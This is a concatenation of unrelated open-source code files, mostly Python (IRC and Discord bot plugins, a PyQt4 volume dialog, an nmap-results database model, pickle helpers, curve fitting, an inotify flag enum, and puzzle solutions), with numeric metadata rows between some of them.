helpstring = "lurk"
minlevel = 3
def main(connection, info, args) :
"""Deops and voices the sender"""
connection.rawsend("MODE %s -o+v %s %s\n" % (info["channel"], info["sender"], info["sender"]))
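The raw IRC line the plugin emits is plain %-formatting, so the exact bytes sent can be checked directly (the helper name, channel, and nick below are made up for illustration):

```python
def build_mode_line(channel, sender):
    # -o removes op, +v grants voice; both apply to the same nick.
    return "MODE %s -o+v %s %s\n" % (channel, sender, sender)

print(repr(build_mode_line("#lounge", "sonic")))  # 'MODE #lounge -o+v sonic sonic\n'
```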
# -*- coding: utf-8 -*-
# volume_editor_layout.py (repo: singleswitch/ticker, license: MIT)
# Form implementation generated from reading ui file 'volume_layout.ui'
#
# Created: Tue Mar 26 12:40:36 2013
# by: PyQt4 UI code generator 4.7.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(522, 285)
self.gridLayout = QtGui.QGridLayout(Dialog)
self.gridLayout.setObjectName("gridLayout")
self.volume_label_0 = QtGui.QLabel(Dialog)
self.volume_label_0.setObjectName("volume_label_0")
self.gridLayout.addWidget(self.volume_label_0, 2, 1, 1, 1)
self.volume_label_1 = QtGui.QLabel(Dialog)
self.volume_label_1.setObjectName("volume_label_1")
self.gridLayout.addWidget(self.volume_label_1, 3, 1, 1, 1)
self.volume_settings_1 = QtGui.QSlider(Dialog)
self.volume_settings_1.setMinimum(1)
self.volume_settings_1.setMaximum(1000)
self.volume_settings_1.setProperty("value", 802)
self.volume_settings_1.setSliderPosition(802)
self.volume_settings_1.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_1.setObjectName("volume_settings_1")
self.gridLayout.addWidget(self.volume_settings_1, 3, 2, 1, 1)
self.volume_label_2 = QtGui.QLabel(Dialog)
self.volume_label_2.setObjectName("volume_label_2")
self.gridLayout.addWidget(self.volume_label_2, 4, 1, 1, 1)
self.volume_settings_2 = QtGui.QSlider(Dialog)
self.volume_settings_2.setMinimum(1)
self.volume_settings_2.setMaximum(1000)
self.volume_settings_2.setProperty("value", 1000)
self.volume_settings_2.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_2.setObjectName("volume_settings_2")
self.gridLayout.addWidget(self.volume_settings_2, 4, 2, 1, 1)
self.volume_label_3 = QtGui.QLabel(Dialog)
self.volume_label_3.setObjectName("volume_label_3")
self.gridLayout.addWidget(self.volume_label_3, 5, 1, 1, 1)
self.volume_settings_3 = QtGui.QSlider(Dialog)
self.volume_settings_3.setMinimum(1)
self.volume_settings_3.setMaximum(1000)
self.volume_settings_3.setProperty("value", 800)
self.volume_settings_3.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_3.setObjectName("volume_settings_3")
self.gridLayout.addWidget(self.volume_settings_3, 5, 2, 1, 1)
self.volume_label_4 = QtGui.QLabel(Dialog)
self.volume_label_4.setObjectName("volume_label_4")
self.gridLayout.addWidget(self.volume_label_4, 6, 1, 1, 1)
self.volume_settings_4 = QtGui.QSlider(Dialog)
self.volume_settings_4.setMinimum(1)
self.volume_settings_4.setMaximum(1000)
self.volume_settings_4.setPageStep(12)
self.volume_settings_4.setProperty("value", 700)
self.volume_settings_4.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_4.setObjectName("volume_settings_4")
self.gridLayout.addWidget(self.volume_settings_4, 6, 2, 1, 1)
self.volume_settings_0 = QtGui.QSlider(Dialog)
self.volume_settings_0.setMinimum(1)
self.volume_settings_0.setMaximum(1000)
self.volume_settings_0.setProperty("value", 702)
self.volume_settings_0.setSliderPosition(702)
self.volume_settings_0.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_0.setObjectName("volume_settings_0")
self.gridLayout.addWidget(self.volume_settings_0, 2, 2, 1, 1)
self.box_mute_0 = QtGui.QCheckBox(Dialog)
self.box_mute_0.setObjectName("box_mute_0")
self.gridLayout.addWidget(self.box_mute_0, 2, 3, 1, 1)
self.box_mute_1 = QtGui.QCheckBox(Dialog)
self.box_mute_1.setObjectName("box_mute_1")
self.gridLayout.addWidget(self.box_mute_1, 3, 3, 1, 1)
self.box_mute_2 = QtGui.QCheckBox(Dialog)
self.box_mute_2.setObjectName("box_mute_2")
self.gridLayout.addWidget(self.box_mute_2, 4, 3, 1, 1)
self.box_mute_3 = QtGui.QCheckBox(Dialog)
self.box_mute_3.setObjectName("box_mute_3")
self.gridLayout.addWidget(self.box_mute_3, 5, 3, 1, 1)
self.box_mute_4 = QtGui.QCheckBox(Dialog)
self.box_mute_4.setObjectName("box_mute_4")
self.gridLayout.addWidget(self.box_mute_4, 6, 3, 1, 1)
self.box_mute_all = QtGui.QCheckBox(Dialog)
self.box_mute_all.setObjectName("box_mute_all")
self.gridLayout.addWidget(self.box_mute_all, 0, 3, 1, 1)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "Volume Editor", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_0.setText(QtGui.QApplication.translate("Dialog", "Cheerful Charlie", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_1.setText(QtGui.QApplication.translate("Dialog", "Sad Sandy", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_1.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_2.setText(QtGui.QApplication.translate("Dialog", "Bartitone Bob", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_2.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_3.setText(QtGui.QApplication.translate("Dialog", "Melodic Mary", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_3.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_4.setText(QtGui.QApplication.translate("Dialog", "Precise Pete", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_4.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_0.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_0.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_1.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_2.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_3.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_4.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_all.setText(QtGui.QApplication.translate("Dialog", "Mute all", None, QtGui.QApplication.UnicodeUTF8))
| 62.339286 | 154 | 0.728445 | 915 | 6,982 | 5.331148 | 0.112568 | 0.129151 | 0.158672 | 0.111521 | 0.742722 | 0.643501 | 0.317343 | 0.202747 | 0.202747 | 0.202747 | 0 | 0.042886 | 0.158407 | 6,982 | 111 | 155 | 62.900901 | 0.78727 | 0.03108 | 0 | 0 | 1 | 0 | 0.091474 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.010204 | 0 | 0.040816 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
# pipeline/models/nmap_model.py (repo: ponderng/recon-pipeline, license: MIT)
import textwrap
from sqlalchemy.orm import relationship
from sqlalchemy import Column, Integer, ForeignKey, String, Boolean
from .base_model import Base
from .port_model import Port
from .ip_address_model import IPAddress
from .nse_model import nse_result_association_table
class NmapResult(Base):
""" Database model that describes the TARGET.nmap scan results.
Represents nmap data.
Relationships:
``target``: many to one -> :class:`pipeline.models.target_model.Target`
``ip_address``: one to one -> :class:`pipeline.models.ip_address_model.IPAddress`
``port``: one to one -> :class:`pipeline.models.port_model.Port`
``nse_results``: one to many -> :class:`pipeline.models.nse_model.NSEResult`
"""
def __str__(self):
return self.pretty()
def pretty(self, commandline=False, nse_results=None):
pad = " "
ip_address = self.ip_address.ipv4_address or self.ip_address.ipv6_address
msg = f"{ip_address} - {self.service}\n"
msg += f"{'=' * (len(ip_address) + len(self.service) + 3)}\n\n"
msg += f"{self.port.protocol} port: {self.port.port_number} - {'open' if self.open else 'closed'} - {self.reason}\n"
msg += f"product: {self.product} :: {self.product_version}\n"
msg += "nse script(s) output:\n"
if nse_results is None:
# add all nse scripts
for nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
else:
# filter used, only return those specified
for nse_result in nse_results:
if nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
if commandline:
msg += "command used:\n"
msg += f"{pad}{self.commandline}\n"
return msg
__tablename__ = "nmap_result"
id = Column(Integer, primary_key=True)
open = Column(Boolean)
reason = Column(String)
service = Column(String)
product = Column(String)
commandline = Column(String)
product_version = Column(String)
port = relationship(Port)
port_id = Column(Integer, ForeignKey("port.id"))
ip_address = relationship(IPAddress)
ip_address_id = Column(Integer, ForeignKey("ip_address.id"))
target_id = Column(Integer, ForeignKey("target.id"))
target = relationship("Target", back_populates="nmap_results")
nse_results = relationship("NSEResult", secondary=nse_result_association_table, back_populates="nmap_results")
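The `pretty()` method above leans on `textwrap.indent` to nest each NSE script's output under its script id; a quick standalone check of that padding behaviour (the sample strings are made up):

```python
import textwrap

pad = "  "
script_output = "80/tcp open\nhttp-title: Example"

# each nse script's output is indented two pad-widths under its script id
indented = textwrap.indent(script_output, pad * 2)
assert indented == "    80/tcp open\n    http-title: Example"
```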
| 35.641026 | 124 | 0.632014 | 344 | 2,780 | 4.918605 | 0.267442 | 0.058511 | 0.054374 | 0.031915 | 0.159574 | 0.14539 | 0.113475 | 0.113475 | 0.113475 | 0.113475 | 0 | 0.002396 | 0.249281 | 2,780 | 77 | 125 | 36.103896 | 0.808337 | 0.170863 | 0 | 0.125 | 0 | 0.020833 | 0.199198 | 0.057932 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.145833 | 0.020833 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
eac399423be5d4d4f542d0d58d41f6e21f9aff4b | 607 | py | Python | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 45 | 2020-01-18T03:46:07.000Z | 2022-03-26T13:06:36.000Z | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 1 | 2020-08-16T12:42:05.000Z | 2020-08-16T12:42:05.000Z | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 9 | 2020-01-04T09:09:01.000Z | 2022-01-17T08:56:23.000Z | # -*- coding: utf-8 -*-
# Author: XuMing <xuming624@qq.com>
# Brief:
import os
import pickle
def load_pkl(pkl_path):
"""
Load a pickled dictionary file.
:param pkl_path: path to the pickle file
:return: the unpickled object
"""
with open(pkl_path, 'rb') as f:
result = pickle.load(f)
return result
def dump_pkl(vocab, pkl_path, overwrite=True):
"""
Dump an object to a pickle file.
:param vocab: object to serialize
:param pkl_path: destination path
:param overwrite: if False and the file already exists, do nothing
:return:
"""
if os.path.exists(pkl_path) and not overwrite:
return
with open(pkl_path, 'wb') as f:
# pickle.dump(vocab, f, protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(vocab, f, protocol=0)
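A minimal round-trip sketch of the two helpers above, written against a temporary directory (the path and sample vocab are hypothetical):

```python
import os
import pickle
import tempfile

def load_pkl(pkl_path):
    with open(pkl_path, 'rb') as f:
        return pickle.load(f)

def dump_pkl(vocab, pkl_path, overwrite=True):
    if os.path.exists(pkl_path) and not overwrite:
        return
    with open(pkl_path, 'wb') as f:
        pickle.dump(vocab, f, protocol=0)

path = os.path.join(tempfile.mkdtemp(), 'vocab.pkl')
dump_pkl({'词典': 1, 'word': 2}, path)
assert load_pkl(path) == {'词典': 1, 'word': 2}
```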
| 19.580645 | 65 | 0.599671 | 82 | 607 | 4.317073 | 0.463415 | 0.138418 | 0.067797 | 0.096045 | 0.254237 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011186 | 0.263591 | 607 | 30 | 66 | 20.233333 | 0.780761 | 0.332784 | 0 | 0 | 0 | 0 | 0.011396 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
eac859440d6090d9d16a4764c580ec95eb663ba2 | 310 | py | Python | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null |
from pyrogram import Client, Filters
@Client.on_message(Filters.command(["help"]))
async def start(client, message):
    helptxt = "Currently only supports single YouTube videos (no playlists). Just send a YouTube URL. You must join my updates channel 👉👉 @Mega_Bots_Updates"
await message.reply_text(helptxt)
| 34.444444 | 151 | 0.767742 | 45 | 310 | 5.244444 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145161 | 310 | 8 | 152 | 38.75 | 0.883019 | 0 | 0 | 0 | 0 | 0.2 | 0.446602 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eacc2257b27de8eb2645ec30a826a06701432acc | 972 | py | Python | addons/meme.py | 916253/Kurisu-Reswitched | 143c27e42049de8ccc8c5c76f503ea96e89c179c | [
"Apache-2.0"
] | 13 | 2017-08-18T00:25:26.000Z | 2020-12-06T00:59:47.000Z | addons/meme.py | 916253/Kurisu-Reswitched | 143c27e42049de8ccc8c5c76f503ea96e89c179c | [
"Apache-2.0"
] | 11 | 2018-04-13T16:57:13.000Z | 2018-12-23T11:52:19.000Z | addons/meme.py | 916253/Kurisu-Reswitched | 143c27e42049de8ccc8c5c76f503ea96e89c179c | [
"Apache-2.0"
] | 21 | 2017-08-04T16:33:15.000Z | 2019-03-11T17:01:48.000Z | import discord
import random
from discord.ext import commands
class Meme:
"""
Meme commands.
"""
def __init__(self, bot):
self.bot = bot
print('Addon "{}" loaded'.format(self.__class__.__name__))
@commands.command(pass_context=True, hidden=True, name="bam")
async def bam_member(self, ctx, user: discord.Member, *, reason=""):
"""Bams a user owo"""
await self.bot.say("{} is ̶n͢ow b̕&̡.̷ 👍̡".format(self.bot.escape_name(user)))
@commands.command(pass_context=True, hidden=True, name="warm")
async def warm_member(self, ctx, user: discord.Member, *, reason=""):
"""Warms a user :3"""
await self.bot.say("{} warmed. User is now {}°C.".format(user.mention, str(random.randint(0, 100))))
@commands.command(hidden=True)
async def frolics(self):
"""test"""
await self.bot.say("https://www.youtube.com/watch?v=VmarNEsjpDI")
def setup(bot):
bot.add_cog(Meme(bot))
| 29.454545 | 108 | 0.622428 | 139 | 972 | 4.280576 | 0.489209 | 0.070588 | 0.060504 | 0.07563 | 0.268908 | 0.268908 | 0.268908 | 0.147899 | 0 | 0 | 0 | 0.006427 | 0.199588 | 972 | 32 | 109 | 30.375 | 0.748072 | 0.014403 | 0 | 0 | 0 | 0 | 0.130337 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.111111 | 0.166667 | 0 | 0.333333 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ead2a27fde0318e6470fc8deff78230ddd7bed04 | 803 | py | Python | fitter.py | quantummind/quantum-rcs-boundaries | 5c1da3378b72db061960f113dfed77b506f9acae | [
"MIT"
] | null | null | null | fitter.py | quantummind/quantum-rcs-boundaries | 5c1da3378b72db061960f113dfed77b506f9acae | [
"MIT"
] | null | null | null | fitter.py | quantummind/quantum-rcs-boundaries | 5c1da3378b72db061960f113dfed77b506f9acae | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
from sklearn.metrics import r2_score
import datetime
def func(x, a, b):
return a + b*x
def exp_regression(x, y):
p, _ = curve_fit(func, x, np.log(y))
p[0] = np.exp(p[0])
return p
def r2(coeffs, x, y):
return r2_score(np.log(y), np.log(coeffs[0]*np.exp(coeffs[1]*x)))
# calculate exponential fit for error rate extrapolation
# report as annual decay (i.e. error rate decreases by fixed factor every year)
errors = pd.read_csv('error_rates.csv')
x = pd.to_datetime(errors.iloc[:, 0]).astype(int)
y = errors.iloc[:, 1]
out = exp_regression(x, y)
print('annual error rate decay', np.exp(out[1]*pd.Timedelta(datetime.timedelta(days=365.2422)).delta))
print('R^2', r2(out, x, y))
| 30.884615 | 102 | 0.697385 | 147 | 803 | 3.741497 | 0.455782 | 0.014545 | 0.050909 | 0.054545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027982 | 0.154421 | 803 | 26 | 103 | 30.884615 | 0.782032 | 0.164384 | 0 | 0 | 0 | 0 | 0.061286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.3 | 0.1 | 0.6 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
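The regression works because log(a·e^(bx)) = log(a) + b·x is linear in x; a sketch of the same log-linear idea using only `numpy.polyfit` on synthetic data (the parameter values are chosen purely for illustration):

```python
import numpy as np

x = np.linspace(0.0, 4.0, 50)
y = 2.0 * np.exp(0.5 * x)                # synthetic y = a * exp(b * x)

b, log_a = np.polyfit(x, np.log(y), 1)   # fit log(y) = log(a) + b*x
a = np.exp(log_a)

assert abs(a - 2.0) < 1e-6
assert abs(b - 0.5) < 1e-6
```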
ead9a8850641b407ccfaaf3b32efd4d1d2d9ec12 | 2,869 | py | Python | notes/reference/moocs/udacity/cs50-introduction-to-computer-science/assignments/pset1/pennies/pennies.py | aav789/study-notes | 34eca00cd48869ba7a79c0ea7d8948ee9bde72b9 | [
"MIT"
] | 43 | 2015-06-10T14:48:00.000Z | 2020-11-29T16:22:28.000Z | notes/reference/moocs/udacity/cs50-introduction-to-computer-science/assignments/pset1/pennies/pennies.py | aav789/study-notes | 34eca00cd48869ba7a79c0ea7d8948ee9bde72b9 | [
"MIT"
] | 1 | 2021-11-01T12:01:44.000Z | 2021-11-01T12:01:44.000Z | notes/reference/moocs/udacity/cs50-introduction-to-computer-science/assignments/pset1/pennies/pennies.py | lextoumbourou/notes | 5f94c59a467eb3eb387542bdce398abc0365e6a7 | [
"MIT"
] | 40 | 2015-03-02T10:33:59.000Z | 2020-05-24T12:17:05.000Z | """
pennies.py
Computer Science 50 in Python (Hacker Edition)
Problem Set 1
Gets the number of days in the month, then works out how much money you'd have
by the end of the month if you received a penny on the first day, two on the
second, four on the third, and so on
"""
def get_input(question):
"""Get the days input from the user """
return raw_input(question + " ")
def is_valid_days(days):
"""Check if the number of days is between 28 and 31"""
try:
days = int(days)
except ValueError:
print "Not a valid integer"
return False
if days < 28 or days > 31:
print "Not a valid number of days"
return False
return days
def is_valid_cents(cents):
"""Ensure number of cents is a valid int"""
try:
return int(cents)
except ValueError:
print "That's not a number."
return False
class Exponenter():
days = None
cents = None
dols = None
def __init__(self, cents, days):
"""
Takes an integer of cents and days
then performs exponent analysis
"""
self.cents = cents
self.days = days
self.final_cents = self._exponent()
def __unicode__(self):
"""Return the string output in $00,000,000 format"""
output = ""
# Reverse the string using extended slice syntax
rev_dols = "{0:.2f}".format(self.dols)[::-1]
# If the dollars is more than 1000, add a comma every 3 digits
if self.dols >= 1000:
for count, char in enumerate(rev_dols):
count += 1
output += char
if count <= 3:
# Ignore first 3 characters, as they're decimal points
continue
if count % 3 == 0 and len(rev_dols) != count:
# For every 3 characters, that's not the last one, add a ,
output += ","
else:
output = rev_dols
# Reverse the output and return it
str_dols = output[::-1]
return "${0}".format(str_dols)
def __repr__(self):
"""Return the representation as float of dollars"""
return "{0}".format(self.dols)
def _exponent(self):
# For each day, multiply the cents by an incrementer that doubles each time
inc = 1
for day in range(1, self.days+1):
final_cents = self.cents*inc
inc += inc
# Return the number of dollars (cents/100)
self.dols = final_cents/float(100)
return final_cents
if __name__ == '__main__':
days = False
while not days:
days = is_valid_days(get_input("Number of days in month? "))
cents = False
while not cents:
cents = is_valid_cents(get_input("Numbers of cents on first day? "))
exp = Exponenter(cents, days)
print "{0}".format(unicode(exp))
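The hand-rolled reversed-string comma grouping in `__unicode__` reimplements what Python's format mini-language already provides; a quick equivalence check (the sample value is arbitrary):

```python
dols = 1234567.891

# ',' in the format spec groups thousands; '.2f' keeps two decimal places
formatted = "${0:,.2f}".format(dols)
assert formatted == "$1,234,567.89"
```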
| 27.586538 | 83 | 0.580342 | 394 | 2,869 | 4.114213 | 0.347716 | 0.024676 | 0.022209 | 0.016039 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026028 | 0.330429 | 2,869 | 103 | 84 | 27.854369 | 0.817803 | 0.127222 | 0 | 0.118644 | 0 | 0 | 0.077325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.067797 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eaddd0f58ee1e0957f0264ad5e92e223afa6c673 | 2,753 | py | Python | minotaur/_mask.py | trel/minotaur | 608f13582e88677fc946c6cb84ec03459f29b4f9 | [
"Apache-2.0"
] | null | null | null | minotaur/_mask.py | trel/minotaur | 608f13582e88677fc946c6cb84ec03459f29b4f9 | [
"Apache-2.0"
] | null | null | null | minotaur/_mask.py | trel/minotaur | 608f13582e88677fc946c6cb84ec03459f29b4f9 | [
"Apache-2.0"
] | null | null | null | from enum import IntFlag as _IntFlag
from . import _inotify
__all__ = ('Mask',)
class Mask(_IntFlag):
"""
Flags for establishing inotify watches.
"""
show_help: bool
def __new__(cls, value, doc=None, show_help=True):
# int.__new__ needs a stub in the typeshed
# https://github.com/python/typeshed/issues/2686
#
# but that broke something else, so they removed it
# https://github.com/python/typeshed/issues/1464
#
# We have no choice but to ignore mypy error here :(
self = int.__new__(cls, value)  # type: ignore
self._value_ = value
if doc is not None:
self.__doc__ = doc
self.show_help = show_help
return self
ACCESS = _inotify.IN_ACCESS, 'File was accessed'
ATTRIB = _inotify.IN_ATTRIB, 'Metadata changed, e.g. permissions'
CLOSE_WRITE = _inotify.IN_CLOSE_WRITE, 'File for writing was closed'
CLOSE_NOWRITE = _inotify.IN_CLOSE_NOWRITE, \
'File or dir not opened for writing was closed'
CREATE = _inotify.IN_CREATE, 'File/dir was created'
DELETE = _inotify.IN_DELETE, 'File or dir was deleted'
DELETE_SELF = _inotify.IN_DELETE_SELF, \
'Watched file/dir was itself deleted'
MODIFY = _inotify.IN_MODIFY, 'File was modified'
MOVE_SELF = _inotify.IN_MOVE_SELF, 'Watched file/dir was itself moved'
MOVED_FROM = _inotify.IN_MOVED_FROM, \
'Generated for dir containing old filename when a file is renamed'
MOVED_TO = _inotify.IN_MOVED_TO, \
'Generated for dir containing new filename when a file is renamed'
OPEN = _inotify.IN_OPEN, 'File or dir was opened'
MOVE = _inotify.IN_MOVE, 'MOVED_FROM | MOVED_TO'
CLOSE = _inotify.IN_CLOSE, 'IN_CLOSE_WRITE | IN_CLOSE_NOWRITE'
DONT_FOLLOW = _inotify.IN_DONT_FOLLOW, \
"Don't dereference pathname if it is a symbolic link"
EXCL_UNLINK = _inotify.IN_EXCL_UNLINK, \
"Don't generate events after files have been unlinked"
MASK_ADD = _inotify.IN_MASK_ADD, 'Add flags to an existing watch', False
ONESHOT = _inotify.IN_ONESHOT, 'Only generate one event for this watch'
ONLYDIR = _inotify.IN_ONLYDIR, 'Watch pathname only if it is a dir'
MASK_CREATE = _inotify.IN_MASK_CREATE, \
"Only watch path if it isn't already being watched"
# These are returned in events
IGNORED = _inotify.IN_IGNORED, 'Watch was removed', False
ISDIR = _inotify.IN_ISDIR, 'This event is a dir', False
Q_OVERFLOW = _inotify.IN_Q_OVERFLOW, 'Event queue overflowed', False
UNMOUNT = _inotify.IN_UNMOUNT, \
'Filesystem containing watched object was unmounted', False
EVENT_TYPE = _inotify.EVENT_TYPE_MASK, 'Mask of all event types', False
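The tuple-valued members above work because enum passes the extra tuple fields into the custom `__new__`; a minimal self-contained sketch of the same pattern (the `Flags` class and its members are invented for illustration):

```python
from enum import IntFlag

class Flags(IntFlag):
    def __new__(cls, value, doc=None, show_help=True):
        self = int.__new__(cls, value)
        self._value_ = value
        if doc is not None:
            self.__doc__ = doc
        self.show_help = show_help
        return self

    READ = 1, 'Object was read'
    HIDDEN = 2, 'Internal flag', False

assert Flags.READ.__doc__ == 'Object was read'
assert Flags.HIDDEN.show_help is False
assert int(Flags.READ | Flags.HIDDEN) == 3
```

This is the same technique the standard library uses for `http.HTTPStatus`, where each member carries a phrase and description alongside its integer value.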
| 39.328571 | 76 | 0.68834 | 386 | 2,753 | 4.626943 | 0.365285 | 0.120941 | 0.023516 | 0.022396 | 0.097424 | 0.097424 | 0 | 0 | 0 | 0 | 0 | 0.003788 | 0.232837 | 2,753 | 69 | 77 | 39.898551 | 0.841856 | 0.100618 | 0 | 0 | 0 | 0 | 0.349233 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.044444 | 0 | 0.688889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
eadee64286add827e7acf16d36f21a8972ee0cfb | 4,991 | py | Python | 24_immune_system_simulator.py | KanegaeGabriel/advent-of-code-2018 | b57f21901b731b4ffe6a2bf134d0bda28d326997 | [
"MIT"
] | null | null | null | 24_immune_system_simulator.py | KanegaeGabriel/advent-of-code-2018 | b57f21901b731b4ffe6a2bf134d0bda28d326997 | [
"MIT"
] | null | null | null | 24_immune_system_simulator.py | KanegaeGabriel/advent-of-code-2018 | b57f21901b731b4ffe6a2bf134d0bda28d326997 | [
"MIT"
] | null | null | null | ################################################
# --- Day 24: Immune System Simulator 20XX --- #
################################################
import AOCUtils
def getTargets(atkArmy, defArmy):
targeted = set()
for atkGroup in atkArmy:
if len(targeted) < len(defArmy):
dmgGiven = []
for defGroup in defArmy:
dmg = (defGroup.calcDmgTaken(atkGroup), defGroup.getEffectivePower(), defGroup.initiative, defGroup)
dmgGiven.append(dmg)
dmgGiven.sort(reverse=True)
# Find best target that hasn't been targeted yet
take = 0
while dmgGiven[take][-1] in targeted:
take += 1
# Only select targets that would deal damage to
if dmgGiven[take][0] > 0:
targeted.add(dmgGiven[take][-1])
atkGroup.target = dmgGiven[take][-1]
else:
atkGroup.target = None
def battle(rawImmune, rawInfection, boost=0):
immuneArmy = [Group(rawGroup) for rawGroup in rawImmune]
infectionArmy = [Group(rawGroup) for rawGroup in rawInfection]
for g in immuneArmy: g.dmgAmt += boost
immuneArmyUnits = sum(g.units for g in immuneArmy)
